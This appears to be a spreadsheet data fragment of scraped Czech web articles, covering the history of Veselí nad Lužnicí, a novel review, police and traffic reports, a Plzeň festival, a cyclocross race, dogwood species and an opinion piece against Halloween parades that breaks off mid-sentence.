Veselí byla návštěva císaře Karla VI . na veselské faře. Zdržel se zde při své cestě do Budějovic 21. srpna 1732 mezi 10. až 17. hodinou. Roku 1764 zažilo Veselí velký požár. Vyhořela radnice, městský archiv, pivovar a čtyři velké domy. V roce 1852 byly do města umístěny státní úřady. V červnu 1866 postihl město další velký požár. Dostal se i do Mezimostí , kde stačil strávit 35 domů. Roku 1881 byla na veselském náměstí vystavěna nová školní budova. Do té doby se vyučovalo ve zvláštní školní budově naproti kostelu. V roce 1907 byla škola založena i v Mezimostí . Do začátku II. svět. války byly otevřeny dvě vyšší školy - Průmyslová škola pokračovací pro učně různých profesí a řemesel, později přejmenovaná na Živnostenskou školu pokračovací (1886 - 1947) a Lidová škola hospodářská (1928 - 1944). Místní muzeum bylo otevřeno v roce 1950 a nese jméno sběratele lidových písní Karla Weise . Mezimostí Poprvé je tato osada připomínána ve 14. století v souvislosti s veselskou tvrzí. Mezimostská tvrz byla od veselské vzdálena jen několik metrů - stála při soutoku Lužnice a Nežárky . Její původní držitelé - páni z Mezimostí - se nazývali Jeníkové a nosili ve štítě chrta. V roce 1369 se stal majitelem Mezimostí Oldřich z Rožmberka, koncem 14. století Vilém z Landštejna a v 15. století vlastnili osadu opět Rožmberkové . Roku 1465 ji Jan z Rožmberka prodal obci Mezimostí . V roce 1494 povyšuje Petr z Rožmberka Mezimostí na městečko se všemi právy svobodných měst. Od roku 1725 vystřídala obec několik majitelů, až se po roce 1769 vrátila zpět měšťanstvu. Mezimostí sdílelo podobné osudy jako Veselí, ale vzhledem k nepříznivější poloze zažilo více povodňových katastrof. Nejničivější povodeň v září 1890 strhla všechny mosty. Strategického významu dosáhlo Mezimostí až v 19. století, kdy se stalo jednou z nejvýznamějších železničních stanic v zemi. To zapříčinilo, že na počátku 20. století bylo už početnější než Veselí. 13. listopadu 1908 povyšuje císař František Josef I. městečko Mezimostí na město. Spojení měst V minulosti bylo často jednáno o sloučení měst Veselí a Mezimostí . Avšak neústupní patrioti, a to jak „košťálníci“ (veselští), tak „chramošťáci“ (mezimostští) nechtěli vidět výhodnost spojení obou měst. Až v době fašistické okupace byla správa obou měst seznámena s tím, že ke sloučení dojde cestou nařizovací. Ministr vnitra ustanovil pro obec vzniklou sloučením Veselí nad Lužnicí a Mezimostí nad Nežárkou jednotný německý název „Frohenbruck“ a český úřední název Veselí nad Lužnicí , a to od 1. 1. 1943. V poválečných letech se mezimostští marně snažili opět rozdělit spojená města, a teprve čas prokázal prospěšnost sloučení. Více informací najdete na webu spolku Přátelé historie Veselí nad Lužnicí www.veselipratelehistorie.cz. Školní jídelny Šachový klub Veselí nad Lužnicí , z. s., tel.: 724 040 059 Rescue Team Veselí, z.s., tel.: 606 848 156 Český rybářský svaz - místní organizace, tel.: 721 421 883 Český kynologický svaz , ZO, kynologická org. 338 , tel.: 607 864 054 Českomoravský modelářský svaz Klub ekologické výchovy a Ekocentrum Rojovník , tel.: 381 581 638 Myslivecké sdružení Soutok , tel.: 607 177 156 Přátelé historie Veselí n . L. a okolí, tel.: 799 794 614 Sbor dobrovolných hasičů, tel.: 150 SDH Veselí n. L. zasahuje u mimořádných událostí na základě pokynů operačního střediska Hasičského záchranného sboru. SDH Veselí n. L. nevyjíždí k mimořádným událostem na základě telefonátu na soukromé číslo starosty SDH. Vždy je potřeba volat 150 (případně 112). Český svaz včelařů , tel.: 602 438 346 Sdružená obec baráčníků Vitoraz Veselí nad Lužnicí , tel.: 602 943 256 Sdružená obec baráčníků Vitoraz Veselí nad Lužnicí</t>
  </si>
  <si>
    <t>637</t>
  </si>
  <si>
    <t>1.89</t>
  </si>
  <si>
    <t>20241101_311_3243056242_53823e2b7376f7d0f7ae.html</t>
  </si>
  <si>
    <t>53823e2b7376f7d0f7ae</t>
  </si>
  <si>
    <t>Naše matka</t>
  </si>
  <si>
    <t>Naše matka Pokračování švédské trilogie o Jane Kippové nese název „ Naše matka “. Čtenář se opět musí připravit na absenci interpunkce, že se jména píši s malými počátečními písmeny a přímá řeč, které je v románu požehnaně, není v uvozovkách. Ve Švédsku se trilogie stala senzací a byla nominována na prestižní Augustovu cenu – zcela zaslouženě! Jana a její bratr – dvojčata – zdědí po matčině smrti dům v její odlehlé vesnici, o niž neměli do té doby nejmenší tušení. Život na vesnici je vždy řízen jinými pravidly než anonymní bytí ve městě. Na vesnici ví každý o každém, o to víc, když k sobě místní komunita jen tak někoho nepustí a náboženství je gró celého společenství. Bratr je očarován mocí místních mužů. Zde má chlap stále poslední slovo a je ženě nadřazen. Život tvrdý, plný chlastu , násilí a arogance. To se Jane ani trošku nelíbí. Je to silná, sebevědomá žena, která je však ztracena ve svém vnitřním soužení a nešťastné lásce. Přátelskou náruč nalezne u svého bratrance, jenž je jeden z těch, kdo byl z komunity dříve vyobcován. Jane jsem si zamilovala už v prvním díle. Sice mě některé její názory a rozhodnutí dost vytáčely, ale vesměs není možnost si ji neoblíbit. Hlavním hnacím motorem celého příběhu je touha po odpuštění a vyrovnání se s bolestí, kterou si s sebou oba sourozenci od dětství nosí hluboko ve svém nitru. Na jejich příkladu jde krásně vidět, jak neblahé události z dětství dokáží manipulovat s lidským vědomím a chováním i v pokročilém věku. Bylo to náročné čtení, a to ne pro tu zvláštní formu textu, kterou je román napsán, ale pro obsah, který je skličující a deprimující, avšak zároveň plný zoufalé naděje v budoucí dobro, o které Jane nepřestává usilovat. Švédská autorka Karin Smirnoff má jedinečný dar podat příběh naprosto autentickou formou. Nemohu se dočkat závěrečného dílu, který snad Kniha Zlín brzy vydá. Za recenzní výtisk děkuji Albatrosmedia.cz. Více z LaCultury... Upřímně bych byla dost vytočená, kdybych začala knihu číst bez toho, aniž bych věděla, že budou v textu chybět čárky, jména se budou psát malými písmeny na začátku a přímá řeč, které je v […] 24. února, 2024 Nejdříve bych chtěla moc poděkovat společnosti Albatros Media za poskytnutí této knihy k recenzi. Karin Smirnoff je pro mě neznámá autorka a anotace knihy Můj bratr mě zaujala natolik, […] 8. května, 2024 „Být hodný, milý a laskavý člověka nic nestojí.“ – citace z knihy, str. 14 – Autobiografický román „Josefův osud“ se zcela vypovídajícím podnázvem, který nám jasně říká, čemu je dílo […] 29. října, 2024 Když jsem dočetla před rokem autorčinu knihu Kniha, kterou posypal hvězdný prach, byla jsem nadšená a těšila jsem se, až autorka Nora Eckhardtová vydá další knihu. Jaké bylo mé překvapení […] 27. října, 2024 Českou psychiatričku a spisovatelku Annu Moricovou jsme na knižních pultech prvně zaznamenali s titulem „Deníček psychiatričky“, který vyšel z jejího stejně pojmenovaného webového na […] 25. října, 2024 „Mořský hřbitov“ je jedinečným románovým počinem norského autora Aslaka Noreho, který vydalo nakladatelství Host. Mořským hřbitovem je myšleno místo v Severním ledovém oceánu, kde leží […] 24. října, 2024 Kristina Ohlssonová je autorka, jejíž tvorba mě dosud míjela. Říkala jsem si, aha, další severská detektivka...Jenže v nabídce od Albatros Media s recenzními knihami byla i Mlha. Mě […] 22. října, 2024 Ivana Peroutková je úspěšnou českou překladatelkou a zároveň autorkou několika románů a mnoha knih pro děti. V roce 2024 nakladatelství Motto vydalo její novinku vypovídající o životním […] 21. října, 2024 „Boj, který nevedeš, nemůžeš prohrát.“ – citace z knihy, str. 27 – Mladá fronta letos vydala závěrečný díl skvělé trilogie „Drak“ amerického autora Williama Andrewse , který se […] 20. října, 2024 Japonský spisovatel Kenzaburó Óe , nositel Nobelovy ceny za literaturu, kterou obdržel roku 1994, je českému čtenáři představen jedním ze svých nejúspěšnějších románů, jmenovitě jde o […] 13. října, 2024 „Falešný život nelze žít správně.“ – citace z knihy, str. 13 – Host přichází se svou, v pořadí třetí knihou úspěšného německého autora Ewalda Arenze, zaměřenou na lidské vztahy […] 8. října, 2024 Autor: Denisa Šimíčková Autor person Denisa Šimíčková</t>
  </si>
  <si>
    <t>20241101_312_3243070487_6361d56490b1b18891fa.html</t>
  </si>
  <si>
    <t>6361d56490b1b18891fa</t>
  </si>
  <si>
    <t>Rychlost se mu nevyplatila</t>
  </si>
  <si>
    <t>Rychlost se mu nevyplatila 91 Při měření rychlosti v ulici Ruská v Litvínově zastavila zákonným způsobem hlídka Městské policie Litvínov řidiče, který rychlost překročil o 13 km/h. Při kontrole řidiče zjistili strážníci, že má platný zákaz řízení. Dále že má u města dluh ve výši 73 tisíc korun. Provedli dechovou zkoušku s pozitivním výsledkem 0.43 promile alkoholu v krvi. Byl proveden také test na omamné látky s výsledkem pozitivním na amfetamin. Při lustraci vozidla zjistili strážníci, že řidič není majitelem. Ten tvrdil, že vozidlo koupil od kamaráda a nepřepsal na sebe. Vzhledem ke všem těmto skutečnostem byl řidič omezen na svobodě a předán Policii ČR. Protože se netajil tím, že pro odstavené auto si později dojde a odveze ho, byla na vozidlo dočasně namontována botička. Dalšího řidiče pod vlivem alkoholu odhalila obsluha kamerového systému. Ta si všimla zjevně podnapilého muže, který venčil svého psa ve Fajli, pak nastoupil do auta a odjel. Hlídka řidiče zákonným způsobem zastavila a provedla zkoušku na alkohol s pozitivním výsledkem 2,17 promile alkoholu v krvi. Opilého řidiče předali strážníci Policii ČR. Autor: ink Autor person ink Rubrika transition_slide Rychlé zprávy</t>
  </si>
  <si>
    <t>311</t>
  </si>
  <si>
    <t>173</t>
  </si>
  <si>
    <t>20241101_313_3243070490_17306d6791e84ec83821.html</t>
  </si>
  <si>
    <t>17306d6791e84ec83821</t>
  </si>
  <si>
    <t>Nehody se obešly bez obětí na životech</t>
  </si>
  <si>
    <t>Nehody se obešly bez obětí na životech 71 V minulém týdnu došlo v Ústeckém kraji ke 186 dopravním nehodám a haváriím. Při nehodách nezemřela žádná osoba, 2 osoby utrpěly těžké zranění a 30 osob se zranilo lehce. Hmotná škoda byla odhadnuta na 10 130 000 korun. Počet nehod v jednotlivých okresech: DC – 35, CV – 34, LT – 11, LN – 15, MO – 29, TP – 33, UL – 22, DO Řehlovice – 7. Nejčastější příčinou dopravních nehod byl nesprávný způsob jízdy, a to ve 106 případech. Ve 20 případech bylo příčinou nedání přednosti v jízdě a v 10 případech nepřiměřená rychlost. Z celkového počtu dopravních nehod byli 4 řidiči pod vlivem alkoholu a žádný řidič pod vlivem omamných a psychotropních látek. Autor: ink Autor person ink Rubrika transition_slide Zpravodajství z kraje</t>
  </si>
  <si>
    <t>20241101_314_3265106583_f60f5897cb44af1fdd86.html</t>
  </si>
  <si>
    <t>f60f5897cb44af1fdd86</t>
  </si>
  <si>
    <t>Jak se stát mistrem v art of living bez toho, abyste zruinovali účet na kreditce</t>
  </si>
  <si>
    <t>Jak se stát mistrem v art of living bez toho, abyste zruinovali účet na kreditce autor: Redakce Nezdrave.cz | 01.11.2024 | Lifestyl Žijeme v době, kdy móda „carpe diem“ a vychutnávání života dosahují nových výšin. Všichni chceme být cool a mít zábavu, ale zároveň se nám to nějakým způsobem daří poněkud posrat, když máme na papíře spoustu nezaplacených účtů. Jak tedy říct životu „ano“ a nepřitom se ocitnout na dně? Připravte se na úvahu o tom, jak se stát mistrem v umění žít, aniž byste se museli potýkat s bankrotem. Finanční ladění v umění života Věděli jste, že podle různých studií se průměrný Čech dívá na své finance jako na nutné zlo? Většina z nás to vidí jako mučivou nutnost, zatímco se snažíme bojovat s realitou vysokých nájmů a cenných lahví alkoholu v baru. Ale co když vám řeknu, že investice do zážitků, jako jsou víkendové úniky, gastronomické festivaly a kulturní akce, jsou schopny posílit vaši psychiku mnohem víc, než drahý telefon? Ano, zatímco Yuppie strávil měsíce spořením na špičkový smartphone, vy můžete použít část svých úspor na to, abyste strávili víkend v přírodě a načerpali energii pro další kolo nevyhnutelných pracovních povinností. Naše generace je doslova posedlá zážitky. Mnozí tvrdí, že zážitky jsou novým zlato! Nejenže nám dávají možnost se bavit a žít naplno, ale také nás učí vážit si toho, co máme. Kdo by nechtěl mít ve svém příběhu více vzpomínek než nefunkčních gadgetů? Prostě veďte aktivní život, nejen v pracovním machrování, ale i v osobním růstu. Ten skvělý undergroundový koncert, na který jste šli s partou kamarádů, se bez váhání zapíše do vašeho think tanku vzpomínek, zatímco nový tablet bude za dva roky zastaralý a skončí v koutě jako poslední zbytky vaší studentské éry. Životní styl pod kontrolou Myslíte si, že „low-cost lifestyle“ je oxymóron? Nenechte se zmást. Zábava může být levná, když víte, jak na to. Například pořádání grilovačky ve vašem oblíbeném parku s přáteli je daleko víc osvěžující, než si sednout do drahé restaurace plné křičících dětí. Rádi bychom vás upozornili, že právě tyto momenty se stávají těmi, které si pamatujete na stáří, když si budete s přáteli vyprávět „pohádky o našich mládí“. Jak jsme se po deseti pivech vraceli domů, nebo jak nám ujel poslední noční autobus. K tomu se přidává další, víc rafinovaný aspekt života – osobní branding. Řeč není jen o sociálních médiích a o tom, jak se jakýmkoliv způsobem zviditelnit. Je to do značné míry o vytváření autentičnosti, která s sebou nese hodnoty a postoj. Lidé, kteří se aktivně vyjadřují a žijí svým vlastním způsobem, jsou doslova magnetem na okolí. Šarm, humor a odvaha. To jsou ingredience, které dělají život skutečně zábavným, tedy pokud se nebojíte občas udělat hloupost, na kterou po letech vzpomínáte s úsměvem. Ke všemu se pletou technologie. Místo abyste se honili za posledními trendy, stačí se jen umět zorientovat v tom, co opravdu potřebujete. Je čas ušetřit, ale přitom se neomezeně bavit. Uvědomte si, že „vysokou kvalitu“ za málo peněz lze najít. Takže další neotřelý tip: místo drahého hotelu pro víkendový pobyt zkuste najít místní Airbnb nebo poslední chvíli. Neodejděte ale příliš levně, jinak se vás budou snažit vystěhovat jako turisty po daném víkendu. Takže, milí městští flákači, vyznavači „slow life“ a ti, kdo odvádějí umění života, nezapomínejte – prožitek, autentičnost a trocha osvědčeného životního plánování jsou skutečnými klíči k úspěšnému a radostnému životu. Někdy je snazší skákat mezi vlnami existence, když máte na dosah ruky jasně daný plán, a to nejen na víkend, ale na celý váš pohled na život. Tak hurá do ulic, nebojte se občas udělat bláznovství a žijte život naplno. Nejnovější příspěvky Autor: Redakce Nezdrave.cz</t>
  </si>
  <si>
    <t>20241101_315_3243064668_1aa4271148c324be154c.html</t>
  </si>
  <si>
    <t>1aa4271148c324be154c</t>
  </si>
  <si>
    <t>Mimořádná kontrola policie na Blanensku. Několik dětí bylo pod vlivem alkoholu</t>
  </si>
  <si>
    <t>Mimořádná kontrola policie na Blanensku . Několik dětí bylo pod vlivem alkoholu „Do akce jsme nasadili několik desítek policistů služby pořádkové a kriminální policie ÚO PČR Blansko, jedenáct příslušníků Celní správy, osm strážníků MP Blansko, Letovice , Boskovice , Velké Opatovice a pracovnice Krajské hygienické stanice JmK," upřesnila policejní mluvčí Lenka Petrželková. Během večerních hodin vyrazily kontrolní týmy do restauračních a podobných provozoven i do oblastí, kde se často zdržují mladší lidé. Celkem prověřili 123 osob do 18 let - z toho 107 mladistvých a 16 nezletilých. V devíti případech zaznamenali kontroloři u osob mladistvých přítomnost alkoholu v dechu v rozmezí od 0,11 do 1,15 promile. Jeden z nezletilých měl 0,38 promile. „Celkem jsme zjistili osm protiprávních jednání, z toho sedm přestupků a jeden trestný čin. Nezletilé osoby pod vlivem alkoholu jsme předali zákonným zástupcům," dodala Petrželková. Krimi Nezletilý: Podle trestního zákona je pojem „nezletilý“ osoba, která v době spáchání trestného činu nedovršila patnáctý rok svého věku. Mladistvý: Podle trestního zákona, je mladistvým osoba, která v době spáchání trestného činu již dovršila patnáctý rok, a ještě nepřekročila osmnáctý rok svého věku. Policie hodlá s dalšími podobnými kontrolami pokračovat i v budoucnu. Neuniklo vám? Objížďka kvůli sesuvu svahu v Bílovicích. V Adamově se objevila protestní cedule Objížďka kvůli sesuvu svahu v Bílovicích. V Adamově se objevila protestní cedule | Video: Deník/Jan Charvát Autor: Jakub Dosedla Autor person Jakub Dosedla</t>
  </si>
  <si>
    <t>9280</t>
  </si>
  <si>
    <t>6340</t>
  </si>
  <si>
    <t>20241101_316_3243183569_f8d84d1ea5f08deb52c8.html</t>
  </si>
  <si>
    <t>f8d84d1ea5f08deb52c8</t>
  </si>
  <si>
    <t>Do Plzně přijede Chantal Poullain. Zakončí festival Bonjour Plzeň</t>
  </si>
  <si>
    <t>Do Plzně přijede Chantal Poullain . Zakončí festival Bonjour Plzeň „Festival Bonjour Plzeň, oslavující frankofonní kulturu, se plzeňské veřejnosti představil už v roce 1992 a má za sebou přes tři desítky ročníků. Podzimní edice a další ročník festivalu pokryje programem celý listopad,“ říká Jana Kozlová, ředitelka Alliance Française de Plzeň, která festival pořádá. Do prostor Alliance na náměstí Republiky budou moci během festivalu návštěvníci také zavítat. K vidění tam bude během běžné otvírací doby cestovatelská výstava obrazů malířky Terezy Maříkové, zachycující atmosféru regionu Provence - Alpes-Côte d'Azur . „Na sobotu 9. listopadu jsme si s provozovatelkami centra Zastávka v Přeštické ulici připravili kulturně-gastronomické odpoledne, tematicky nazvané Zastávka ve Francii ,“ uvádí další body programu jeho dramaturgyně Denisa Fournier. „Od 14:00 do 20:00 budou na Zastávce probíhat ochutnávky francouzských delikates, workshopy pro děti a hudební vystoupení. Představí se například francouzský kytarista David Payen nebo spoluzakladatelka kapely The Cracked Cookies Jitka Štěrbáková. Na akci bude možné si také zakoupit květiny, vybraná francouzská vína nebo makronky,“ dodává Fournier. play_fill Plzeňsko Do Semlerovy rezidence pak organizátoři umístili přednášku Romana Musila, ředitele Západočeské galerie , o české a francouzské výtvarné scéně přelomu 19. a 20. století. Vstup je zdarma. Pokud upřednostňujete především francouzskou gastronomii, pak můžete už 2. listopadu začít den s vůní čerstvých croissantů, kávou a francouzskými specialitami v Midaru v Pařížské ulici. Ve festivalové nabídce jsou také kurzy pečení makronek a přípravy těsta na francouzské dezerty v kavárně Dream Up Coffee, konverzační večery a večery s raclette ve Fine France ve Skrétově ulici nebo degustace červených vín v prostorách vinárny Na břehu Rhóny. Zde se zároveň 7. listopadu odehraje setkání s Gaëtanem Piresem, profesionálním tanečníkem z Divadla Josefa Kajetána Tyla . Již tradiční nabídkou Bonjour Plzeň jsou projekce pořádané ve spolupráci s Filmovým klubem Plzeň . 19. listopadu bude v kinosále Měšťanské besedy uveden vítězný dokument hlavní ceny na Berlinale Dahomey a na něj naváže projekce dobrodružného velkofilmu Hrabě Monte Christo. Volný čas „Letošní ročník uzavíráme skromným koncertem, ovšem s velkým jménem. Podzimní Bonjour Plzeň zakončí divadelní a filmová herečka Chantal Poullain , která je oceňována za šíření francouzské kultury v Čechách ,“ připomíná Denisa Fournine s tím, že se svými šansony vystupuje za doprovodu kapely saxofonisty Štěpána Markoviče . Koncert se uskuteční v prostorách vinárny Na břehu řeky Rhóny . Podzimní festival Bonjour Plzeň potrvá od 1. do 21. listopadu a jeho kompletní program lze najít na webových stránkách www.bonjourplzen.cz nebo https://www.alliancefrancaise.cz/plzen/. Autor: Pavel Bouda Autor person Pavel Bouda</t>
  </si>
  <si>
    <t>20241101_317_3265071580_4331f44ebafebc735cda.html</t>
  </si>
  <si>
    <t>4331f44ebafebc735cda</t>
  </si>
  <si>
    <t>Koppenbergcross nabídl málo bláta, divák aspoň zalil pivem Iserbyta. Pro vítězství si dojel podruhé Van der Haar</t>
  </si>
  <si>
    <t>Koppenbergcross nabídl málo bláta, divák aspoň zalil pivem Iserbyta. Pro vítězství si dojel podruhé Van der Haar 01.11.2024 | Tomáš Nohejl / Foto: X2O Badkamers Trofee Pouze dva dny před mistrovstvím Evropy , to je drsná konkurence i pro ikonický Koppenbergcross v Oudenaarde. A i když tolik neutrpěla snad ani účast, tak přece jen závodnický apetit mírně scházel. Ani charakteristika „obtížná stoupání a velkolepé sjezdy rychle následující za sebou, jen tu a tam střídá čas na zotavení,“ se díky podmínkám zcela nenaplnila. Bylo teplo, vlhko přineslo jen mazlavé bláto. Žádný drsný extrém jako loni, kdy poprvé triumfoval Thibau Nys a přinesl desátou dlažební kostku do rodinné sbírky. Devět jich dodal táta Sven. Kopec Bult van Melden, známější jako Koppenberg, aneb 560 metrů s převýšením 61 metrů, známý z Ronde van Vlaanderen, tady bylo o něco snazší. Muži tak odjeli o jeden okruh víc než loni. Zhruba v polovině se zformovala silná pětka Michael Vanthourenhout a Eli Iserbyt (oba Pauwels Sauzen/Bingoal), Lars van der Haar a Thibau Nys (oba Trek Baloise Lions) a Toon Aerts (Deschacht/Hens/FSP). Ten nečekaně hýřil aktivitou, byl vidět nejvíc po únorovém návratu po dvouleté pauze za dopingovou kauzu. Vypadalo to na vzrušující bitvu jako na nedělní Superprestige v Overijse. Jenže brzy se začala i pětka dělit. Van der Haar využil výměnu kol v depu, jako jediný tam nezajel a získal náskok. Nys, první ze skupiny na druhé „koleji“ za ním rozhodně nespěchal, čímž zavřel ostatní. Až pozdě se vymanil z balíku Iserbyt, ale Van der Haara už ani náhodou nedohnal. Navíc na něj jeden divák nepochopitelně chrstnul pivo , podobně jako na Van der Poela, který na ně zato plivnul v lednu v Hulstu… Třetí vyšplhal posedmé na Koppenberg oživený Aerts. S menší jiskrou závodící Nys v posledních metrech přeskočil Vanthourenhouta. Na šesté místo se prodral s vypětím všech sil Pim Ronhaar (Trek Baloise Lions). „Je to pro mě jeden z nejdůležitějších závodů, jezdím sem od juniorů,“ komentoval svůj druhý triumf po dvou letech 33letý Lars van der Haar, nejstarší ze špičky. „Cítil jsem se dobře už před startem a pak jsem využil správné chvíle. V posledním kole mi přeskočil řetěz, bylo to napínavé.“ Udržel však náskok 34 vteřin, což se počítá pro celkové pořadí X20 Trofee. „Po tom incidentu bylo těžké udržet koncentraci, ale Lars byl dnes lepší,“ dodal Iserbyt . „Jsem na tom dobře, ale v akceleraci se vždycky najde někdo lepší,“ komentoval třetí druhé místo v sezóně. Ženský závod nenabídl mnoho vzrušení. Alvarado a další se šetřily už na neděli. Mistryně světa v duhové dresu tak strojovým tempem pozvolna poodjela, vítězka poslední Superprestige marně zapnula ve druhé polovině. Letošní vzájemné skóre v terénu překlopila Van Empel na 3:2. Až neočekávaně radostné vítězné gesto předvedla už před cílovou čarou. „Je to můj oblíbený závod, jsem šťastná, že se to povedlo a vyhrála jsem. Z počátku sezóny jsem byla trošku nejistá, ale jde to správným směrem,“ řekla poté. „Byla lepší technicky a hlavně fyzicky,“ uznala bez smutku a zášti Lucinda Brand (Trek Baloise Lions). „Já jsem možná moc přemýšlela o materiálu a detailech,“ přidala na vysvětlenou, proč v depu měnila nezvykle tři kola. Třetí dojela spokojená italská šampionka Sara Casasola (Crelan/Corendon), která potvrdila stabilní vysokou formu. Češi tu nejeli. Druhý z osmi dílů X20 Badkamers Trofee je na programu příští neděli v Lokerenu , třetí pak o týden později (17. 11.) v Hamme . Tomáš Nohejl / Foto: X2O Badkamers Trofee Diskuze k článku Pro přidávání příspěvku se prosím přihlaste Autor: Tomáš Nohejl Autor person Tomáš Nohejl</t>
  </si>
  <si>
    <t>5290</t>
  </si>
  <si>
    <t>8070</t>
  </si>
  <si>
    <t>20241101_318_3242994610_f4c4348b8b04798d0c0b.html</t>
  </si>
  <si>
    <t>f4c4348b8b04798d0c0b</t>
  </si>
  <si>
    <t>Na dřín pozor! Jedlé jsou plody pouze některých druhů!</t>
  </si>
  <si>
    <t>Na dřín pozor! Jedlé jsou plody pouze některých druhů! 01. 11. 2024 Novinky Okrasné dřeviny Dřín je známý také pod názvem svída. Na zahradě může posloužit jako okrasná rostlina. Existuje spoustu druhů svíd a ty se navíc dělí dále do podrodů. Některé mají čistě okrasnou funkci, ale plody některých druhů můžeme konzumovat. Jsou dokonce velmi zdravé! Podle toho, který druh si vyberete, můžete na zahradě docílit různých efektů. Jednotlivé druhy se liší okrasnými listy, barvou nebo i tvarem plodů či velikostí. Nechte přírodu kouzlit i na své zahradě! Dřín obecný Nejčastěji pěstovaným druhem na českých zahradách je právě dřín obecný (Cornus mas). Tato rostlina se běžně vyskytuje na našem území. Jeho plody červené barvy jsou jedlé a dokonce velmi zdravé! Předchází jim bílé květy, které vypadají velmi krásně. Dřínky jsou zdrojem vitamínu C, proto se z nich často vyrábí sirupy, které mají podpořit imunitu. Můžete je ale použít také na výrobu marmelád či likérů. Svída bílá Svída bílá (Cornus alba) je středně velký keř. Výjimečný je zejména tím, že jeho větve mají červenou barvu, takže poté, co listy na podzim opadají, nabízí keř stále jedinečnou podívanou. Květy jsou obvykle bílé. V tomto případě se jedná o čistě okrasný keř, jehož plody nekonzumujeme. Mezi oblíbené odrůdy patří ‘Sibirica’ nebo ‘Elegantissima’. Dřín japonský Dřín japonský (Cornus kousa) nabízí jedlé plody nezvyklého tvaru. Jsou červené, avšak mají jakoby bodlinky – podobně jako například slupka liči. Tento keř pochází z východní Asie , kde se používá také na výrobu vína . Popsat tuto rostlinu je poměrně složité, protože existuje ve spoustě různých odrůd, které se liší barvou listů či celkovou velikostí. Foto: Pixabay Svída krvavá Tento druh patří k typicky českým druhům, který najdeme i ve volné přírodě. Často na něj narazíme u lesů nebo na křovinatých stráních. Název je odvozen od červeného zbarvení dřevnatých částí rostliny. I když se pěstuje i na zahradách, není příliš dobrý nápad umístit ji v blízkosti zahradního posezení. Její bílé květy totiž silně zapáchají. Nahrazeny jsou černými plody, které se dnes už nepoužívají. Dříve se z nich vyráběly přípravky proti průjmu. Dřín lékařský Název napovídá, že by se mělo jednat o keř, který bude mít léčivé účinky. Pravdou je, že dřín lékařský (Cornus officinalis) je součástí tradiční čínské medicíny. Zde se používá proti široké škále nemocí. U nás ale není příliš rozšířený. Svída střídavolistá Svída střídavolistá (Cornus alternifolia) pochází ze severní Ameriky . Typické jsou pro ni – jak už název napovídá – jednoduché střídavé listy. Ty na podzim opadají. I v tomto případě se nejedná o běžný druh, na který bychom narazili v českých zahradách. Zdroje info: https://www.rostlinky.cz/blog/drin-pestovani-pro-krasu-i-uzitek.html https://fajnyogrod.pl/porady/sadzonki-derenia-jadalnego-rodzaje-ceny-opinie-porady/ Foto: Unsplash Autor: Jana Hlaváčová Autor person Jana Hlaváčová Rubrika transition_slide Novinky</t>
  </si>
  <si>
    <t>27370</t>
  </si>
  <si>
    <t>49040</t>
  </si>
  <si>
    <t>20241101_319_3265060972_5d120906383453242760.html</t>
  </si>
  <si>
    <t>5d120906383453242760</t>
  </si>
  <si>
    <t>Kritický pohled na Halloween a průvody strašidel Období našich svátků zesnulých se překrývá se „svátkem Halloween“, přicházejícím k nám ze západu. Jeho součástí jsou průvody čarodějnic, čertů, upírů a jiných strašidel. A čím jsou tyto masky hrůzostrašnější a děsivější, tím lépe! Tím je větší legrace! Ale je to opravdu jen legrace a nic víc? Asi zcela ne, protože na druhé straně se ozývají různí jednotlivci, ale i různé církve, které s těmito průvody nesouhlasí a sepisují petice, aby je městské, nebo obecní úřady nepovolily. Vidí v nich totiž propagaci zla a temných sil. To se samozřejmě modernímu, ateistickému a materialistickému člověku s jeho snahou užít si dosyta nejrůznějších zábav jeví jako nepochopitelný závan středověku. Jeví se mu to jako zkostnatělá a prudérní ztráta smyslu pro humor. Ale protože materialisté a ateisté vnímají všechny věci jen povrchně, z jejich prvoplánově materialistického hlediska, podívejme se na danou problematiku poněkud hlouběji a ukažme si, co se ve skutečnosti skrývá pod navenek prezentovaným povrchem dobré zábavy. Všechny průvody a pochody tlumočí společnosti toto: „Jsme tady a máme takovýto názor. Dáváme o sobě vědět a je třeba s námi počítat.“ A tak je tomu také v případě různých průvodů čertů, strig a strašidel. Že je to jen humor, zábava a žert, je totiž jen pohádku pro povrchní a prvoplánové. Naopak, povrchnost a prvoplánovost lidí, kteří příliš neuvažují, je dokonale využita k tomu, aby bylo ve společnosti prezentováno to, o co ve skutečnosti pod zástěrkou zábavy jde. A jde o manifestaci temných sil, které dávají společnosti na známost: „Jsme tady a máme své hodnoty! Dáváme o sobě vědět a je třeba s námi počítat!“ Průvody čertů, strig a strašidel, tedy všechno jednoznačně negativních bytostí, jsou reálným svědectvím naší doby, která svou mělkostí myšlení, amorálností, duševní prázdnotou, nectnostmi a nezřízeností vášní navazuje kontakt se sobě stejnorodými, nízkými úrovněmi stvoření. A bytosti z těchto nízkých úrovní pochodují v hrůzostrašných průvodech po našich městech a vesnicích, reprezentujíc temné síly, které se rozpínají po naší planetě, aby ji zcela ovládly. Taková je tedy žel naše moderní civilizace, která inklinuje k nízkosti a temnotě, protože sama je takovou. Vždyť si jen zkusme položit otázku, proč se například v našich městech a vesnicích neorganizují pochody andělů a různých světlých bytostí, které by představovaly ctnosti? Vždyť přece kromě našemu pozemskému oku neviditelných, temných a nízkých úrovní, zalidněných nejrůznějšími hrůzyplnými bytostmi, existují také vysoké a vznešené úrovně, obývané nádhernými, ušlechtilými a ctnostnými bytostmi. Proč našemu světu není blíže toto směřování? Proč nebere inspiraci odtamtud? Proč neorganizujeme průvody tohoto druhu a tvůrci kostýmů a masek se ve své inspiraci nenapojují do těchto úrovní? Protože vrána k vráně sedá a rovný rovného si hledá! Protože převažující nízkost v duších nachází sympatie a stejnorodé spojení s odpovídajícími, nízkými jemnějšími úrovněmi univerza. No a je zcela samozřejmé, že tento trend a toto propojení se příčí lidem, kteří si ještě zachovali alespoň určitou míru ušlechtilosti a soudnosti. Tito lidé mnohdy ne vědomě, ale podvědomě tuší, o co tady jde, a staví se proti tomu. Staví se proti rozpínavosti temnoty, ovládající duše lidí. Staví se proti prezentaci její moci a touze po expanzi, demonstrované pochody padlých, nízkých a ohyzdných bytostí. A když jsme si už objasnili, co všechno se skrývá za touto zdánlivě nevinnou zábavou, zkusme se ještě zamyslet nad tím, kde se cosi takového, jako jsou čerti vůbec vzalo? Každému je jasné, že se nejedná o bytosti z našeho světa, tedy z naší hrubé hmotnosti. Kromě hrubé hmotnosti však existují různé úrovně jemné hmotnosti, kam odcházejí lidské duše po smrti fyzického těla. Každý ví, že lidé jsou buď dobří, nebo špatní. Zlo naše duše zatěžuje a dobro naše duše povznáší. Podle míry dobra a zla má tedy 